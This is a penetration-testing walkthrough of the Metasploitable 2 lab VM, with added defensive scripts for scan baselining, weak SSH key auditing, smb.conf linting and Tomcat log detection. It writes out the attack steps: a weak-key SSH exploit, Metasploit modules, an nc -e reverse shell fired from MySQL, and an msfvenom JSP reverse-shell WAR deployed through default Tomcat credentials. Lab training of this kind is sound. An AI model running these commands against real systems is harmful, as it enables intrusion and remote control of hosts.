Metasploitable-2
This tutorial is sourced from Bob1Bob2 Pentest Notes
Last updated
netdiscover
Nmap
Metasploit
smbclient
enum4linux
Nikto
Use netdiscover to find the target IP address.
192.168.79.179 is the target.
Then run nmap to detect open ports and the services running on the target machine:
nmap -sV -v -O -A -T5 192.168.79.179 -p-
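The scan above is the asset-discovery step; the defensive counterpart is to turn the same scan into an inventory and diff it against the ports you expect to be exposed. The following is an added example (not from these notes or from nmap itself) that parses nmap's grepable output (`-oG`) and reports any open port missing from a baseline. The sample scan text and the baseline are constructed for the example; the version strings are modelled on what Metasploitable 2 reports.

```python
import re
from dataclasses import dataclass

# Constructed sample of nmap grepable output (-oG) for the host in these notes.
# Hand-written for this example, not a captured scan; note that -oG escapes
# slashes inside the version field as "\/".
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated (constructed sample)
Host: 192.168.79.179 ()\tStatus: Up
Host: 192.168.79.179 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, 22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)/, 23/open/tcp//telnet//Linux telnetd/, 139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X (workgroup: WORKGROUP)/, 1099/open/tcp//java-rmi//GNU Classpath grmiregistry/, 1524/open/tcp//bindshell//Metasploitable root shell/, 3306/open/tcp//mysql//MySQL 5.0.51a-3ubuntu5/, 8180/open/tcp//http//Apache Tomcat\\/Coyote JSP engine 1.1/\tIgnored State: closed (65527)
# Nmap done (constructed sample)
"""

# Constructed baseline: the (port, proto) pairs this host is supposed to expose.
BASELINE = {(22, "tcp"), (8180, "tcp")}


@dataclass
class Service:
    host: str
    port: int
    proto: str
    state: str
    name: str
    version: str


# "Host: <ip> (<name>)<TAB>Ports: <entries><TAB>..." ; the entries never contain a tab.
_HOST_PORTS = re.compile(r"^Host:\s+(\S+)\s+\([^)]*\)\tPorts:\s+(.*?)(?:\t|$)")


def parse_gnmap(text):
    """Parse -oG output into Service records (one per port entry)."""
    services = []
    for line in text.splitlines():
        m = _HOST_PORTS.match(line)
        if not m:
            continue
        host, entries = m.group(1), m.group(2)
        for entry in entries.split(", "):
            # Fields: port/state/proto/owner/service/rpcinfo/version/ ; split only on
            # unescaped slashes so "Tomcat\/Coyote" stays one field.
            fields = re.split(r"(?<!\\)/", entry.strip())
            if len(fields) < 7:
                continue
            port, state, proto, _owner, name, _rpc, version = fields[:7]
            services.append(Service(host, int(port), proto, state, name,
                                    version.replace("\\/", "/")))
    return services


def unexpected_exposure(services, baseline):
    """Open services whose (port, proto) is not in the approved baseline."""
    return [s for s in services
            if s.state == "open" and (s.port, s.proto) not in baseline]


if __name__ == "__main__":
    for s in unexpected_exposure(parse_gnmap(SAMPLE_GNMAP), BASELINE):
        print(f"{s.host}:{s.port}/{s.proto} {s.name} ({s.version}) not in baseline")
```

Run the real scan with `-oG scan.gnmap` and feed that file in; anything the function returns is either a missing baseline entry or a service that should not be listening.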
search vsftpd
get the root:
get meterpreter:
Getting access to a system with a writeable filesystem
Since nmap shows the OpenSSH version is 4.7, I googled it and found that it uses OpenSSL 0.9.8g.
search openssl exploit:
searchsploit openssl
Looks like these exploits can be used. The vulnerability is CVE-2008-0166.
I use 5720.py.
First, download the precalculated vulnerable keys:
wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2
extract it:
tar jxf 5622.tar.bz2
run the command:
python 5720.py rsa/2048/ 192.168.79.179 root 22 5
rsa/2048 is the folder containing the keys.
Found keys:
Log in to the box:
ssh -l root -p22 -i rsa/2048//c551f0a5d2f76d88b58b3ae90ceb617a-22002 192.168.79.179
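The reason the login above works is that the key in authorized_keys comes from the small, predictable key space of CVE-2008-0166. The fix on the defending side is to audit authorized_keys (and host keys) against the published weak-key fingerprints, which is what the openssh-blacklist package did. Below is an added example of that check (not from these notes or from any distribution's tooling): it parses an authorized_keys file, computes the SHA256 fingerprint in the same form `ssh-keygen -lf` prints, and reports entries whose fingerprint is in a blocklist. The key blobs and the blocklist are constructed for the example; a real audit would load the published fingerprints instead.

```python
import base64
import hashlib


def ssh_fingerprint(key_blob):
    """SHA256 fingerprint as printed by `ssh-keygen -lf`: base64 without '=' padding."""
    digest = hashlib.sha256(key_blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Yield (line number, key type, raw blob, comment) for each key line."""
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        # A line may start with options such as command="..."; locate the key type token.
        for i, tok in enumerate(parts):
            if tok.startswith(("ssh-", "ecdsa-")):
                break
        else:
            continue
        if i + 1 >= len(parts):
            continue
        try:
            blob = base64.b64decode(parts[i + 1], validate=True)
        except ValueError:  # binascii.Error is a ValueError
            continue
        yield lineno, parts[i], blob, " ".join(parts[i + 2:])


def audit_authorized_keys(text, blocklist):
    """Return the entries whose fingerprint appears in the blocklist."""
    hits = []
    for lineno, key_type, blob, comment in parse_authorized_keys(text):
        fp = ssh_fingerprint(blob)
        if fp in blocklist:
            hits.append({"line": lineno, "type": key_type,
                         "fingerprint": fp, "comment": comment})
    return hits


def _fake_blob(seed):
    # Constructed: ssh-rsa wire-format header followed by junk key material.
    # Not a real key, just bytes for the parser and hasher to work on.
    return (b"\x00\x00\x00\x07ssh-rsa" + b"\x00\x00\x00\x03\x01\x00\x01"
            + b"\x00\x00\x00\x04" + seed.to_bytes(4, "big"))


WEAK_BLOB = _fake_blob(1)
GOOD_BLOB = _fake_blob(2)

# Constructed authorized_keys: one blocklisted key, one clean key with options.
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed sample authorized_keys",
    "ssh-rsa " + base64.b64encode(WEAK_BLOB).decode() + " root@metasploitable",
    'command="/usr/bin/backup" ssh-rsa ' + base64.b64encode(GOOD_BLOB).decode() + " backup@host",
    "",
])

# Constructed blocklist in ssh-keygen -lf format; load the published list in practice.
BLOCKLIST = {ssh_fingerprint(WEAK_BLOB)}


if __name__ == "__main__":
    for hit in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, BLOCKLIST):
        print(f"line {hit['line']}: {hit['type']} {hit['fingerprint']} ({hit['comment']}) is blocklisted")
```

Any hit is a key to revoke and regenerate on a patched system; the same fingerprint function works on `/etc/ssh/ssh_host_*_key.pub` to check the host keys too.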
In msfconsole, search telnet.
The banner shows the username/password,
or you can just run telnet 192.168.79.179
to grab the banner.
Log in:
telnet 192.168.79.179 -l msfadmin
Navigate to port 80. There is a TWiki; search twiki and find an exploit:
exploit/unix/webapp/twiki_history
Using Nikto, I found that the page phpinfo.php is available.
It shows the PHP version is 5.2.4.
search php_cgi
found the exploit exploit/multi/http/php_cgi_arg_injection
5.2.4 may be the vulnerable version.
Enumerate SMB:
enum4linux 192.168.79.179
looks like wide links
looks good
Now use smbclient to log in:
smbclient //192.168.79.179/tmp
Since the Samba version is 3.0.20, I found this module:
exploit/multi/samba/usermap_script
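Three Samba settings drive this part of the notes: `username map script` (what the usermap_script module abuses), `wide links` (from the enum4linux output), and the guest-writable tmp share that smbclient connected to. An added example (not from these notes or from the Samba project) that lints an smb.conf for exactly those settings is below; the sample config is constructed to resemble the target's, and the finding messages are this example's own wording.

```python
import configparser

# Constructed smb.conf modelled on the settings seen on the target
# (username map script, wide links, guest-writable /tmp); not the real file.
SAMPLE_SMB_CONF = """\
; constructed sample
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba %v)
   security = user
   username map script = /etc/samba/scripts/mapusers.sh
   wide links = yes
   unix extensions = yes

[tmp]
   comment = scratch space
   path = /tmp
   read only = no
   guest ok = yes
   browseable = yes

[print$]
   path = /var/lib/samba/printers
   read only = yes
   guest ok = no
"""


def _flag(section, key, default=False):
    """Samba booleans are yes/no/true/false/1/0; unparsable values fall back to the default."""
    try:
        return section.getboolean(key, fallback=default)
    except ValueError:
        return default


def lint_smb_conf(text):
    """Return (section, setting, why) findings for risky smb.conf settings."""
    # smb.conf is INI-like: interpolation off because of %h/%v macros,
    # inline ';' and '#' comments allowed.
    cp = configparser.ConfigParser(interpolation=None, allow_no_value=True,
                                   inline_comment_prefixes=(";", "#"))
    cp.read_string(text)
    findings = []
    if cp.has_section("global"):
        g = cp["global"]
        if g.get("username map script"):
            findings.append(("global", "username map script",
                             "external mapping script is configured; remove it or upgrade Samba"))
        if _flag(g, "wide links"):
            findings.append(("global", "wide links = yes",
                             "symlinks inside a share may resolve to paths outside it"))
    for name in cp.sections():
        if name == "global":
            continue
        share = cp[name]
        # "writable"/"writeable" are inverted synonyms of "read only" (default yes).
        writable = (_flag(share, "writable") or _flag(share, "writeable")
                    or not _flag(share, "read only", default=True))
        if _flag(share, "guest ok") and writable:
            findings.append((name, "guest ok + writable",
                             f"anonymous users can write to {share.get('path', '?')}"))
    return findings


if __name__ == "__main__":
    for section, setting, why in lint_smb_conf(SAMPLE_SMB_CONF):
        print(f"[{section}] {setting}: {why}")
```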
msf > search unreal ircd
same version
Nmap shows port 1099 rmiregistry GNU Classpath grmiregistry
In Metasploit, search rmiregistry; there is one exploit:
exploit/multi/misc/java_rmi_server
Nothing cool, just connect:
nc 192.168.79.179 1524
Discover the MySQL version:
Brute force the MySQL login:
root and guest have no password set.
Once you have the credentials, log in to MySQL:
mysql -h 192.168.79.179 -u root -p
In Kali, set up nc:
nc -nlvp 1234
In MySQL, execute a system command:
mysql> system nc 192.168.79.173 1234 -e /bin/bash
get the root:
search distccd, find an exploit exploit/unix/misc/distcc_exec
search postgresql, find a module auxiliary/scanner/postgres/postgres_login
Find the username/password and log in to PostgreSQL:
psql -h 192.168.79.179 -U postgres
There is another exploit: exploit/linux/postgres/postgres_payload
search vnc, find the scanner auxiliary/scanner/vnc/vnc_login
It finds a password:
Use this password to log in to VNC:
vncviewer 192.168.79.179
search x11, find a scanner auxiliary/scanner/x11/open_x11
shows [*] 192.168.79.179:6000 - 192.168.79.179 Access Denied
Now try to log in to X11 using the telnet username/password:
ssh -X -l msfadmin 192.168.79.179
Use Nikto to scan:
nikto -h 192.168.79.179:8180
Default credentials are found: ID 'tomcat', PW 'tomcat'.
Navigate to http://192.168.79.179:8180/manager/html, enter the username/password, and we are in:
Same as before: generate and upload a WAR reverse shell backdoor.
Create a webshell called index.jsp (from PentesterLab; you may also generate it using msfvenom).
Now pack the webshell:
Deploy it and visit http://192.168.79.179:8180/webshell/index.jsp?
Use msfvenom to create the webshell:
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.79.173 lport=4444 -f war > webshell1.war
Set up nc in Kali, deploy it and visit http://192.168.79.179:8180/webshell1/
After the connection comes back, upgrade to a proper shell:
python -c 'import pty; pty.spawn("/bin/bash")'
Use Metasploit:
msf > search tomcat
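Everything in the Tomcat section leaves a trace in the manager's access log: repeated 401s on /manager while the credentials are guessed, a POST to /manager/html/upload when the WAR goes up, and a request to the new context when the reverse shell is triggered. An added example (not from these notes or from Tomcat) that turns those traces into detections over Tomcat's common-format access log follows; the log lines are constructed, the endpoint list and the failure threshold are assumptions of this example.

```python
import re
from collections import Counter

# Constructed Tomcat access-log lines (common log format) modelled on the
# manager deploy flow in these notes; not a real localhost_access_log file.
SAMPLE_LOG = """\
192.168.79.173 - - [01/Jan/2024:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.168.79.173 - - [01/Jan/2024:10:00:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.168.79.173 - - [01/Jan/2024:10:00:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.168.79.173 - tomcat [01/Jan/2024:10:00:04 +0000] "GET /manager/html HTTP/1.1" 200 16243
192.168.79.173 - tomcat [01/Jan/2024:10:00:09 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 16879
192.168.79.173 - - [01/Jan/2024:10:00:12 +0000] "GET /webshell1/ HTTP/1.1" 200 0
10.0.0.5 - - [01/Jan/2024:10:05:00 +0000] "GET /tomcat-docs/index.html HTTP/1.1" 200 6000
"""

# Common log format: host ident authuser [date] "method path protocol" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)')

# Manager endpoints that deploy an application (HTML upload form, text/legacy deploy).
DEPLOY_ENDPOINTS = (
    ("POST", "/manager/html/upload"),
    ("PUT", "/manager/text/deploy"),
    ("GET", "/manager/text/deploy"),
    ("GET", "/manager/deploy"),
)


def parse_access_log(text):
    """Parse log lines into dicts; the query string is dropped from the path."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["status"] = int(e["status"])
        e["path"] = e["path"].split("?", 1)[0]
        events.append(e)
    return events


def detect(events, auth_fail_threshold=3):
    """Flag WAR deployments and clients with repeated manager auth failures."""
    findings = []
    fails = Counter()
    for e in events:
        if e["path"].startswith("/manager/") and e["status"] == 401:
            fails[e["ip"]] += 1
        for method, prefix in DEPLOY_ENDPOINTS:
            if e["method"] == method and e["path"].startswith(prefix):
                findings.append(("war_deploy", e["ip"], e["user"], e["ts"], e["path"]))
    for ip, n in fails.items():
        if n >= auth_fail_threshold:
            findings.append(("manager_auth_failures", ip, n))
    return findings


if __name__ == "__main__":
    for finding in detect(parse_access_log(SAMPLE_LOG)):
        print(finding)
```

A deployment by the built-in `tomcat` account from a workstation address is the event to alert on; the mitigation is to change or remove the default manager user and restrict the manager app to administrative hosts.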
search drb, find an exploit exploit/linux/misc/drb_remote_codeexec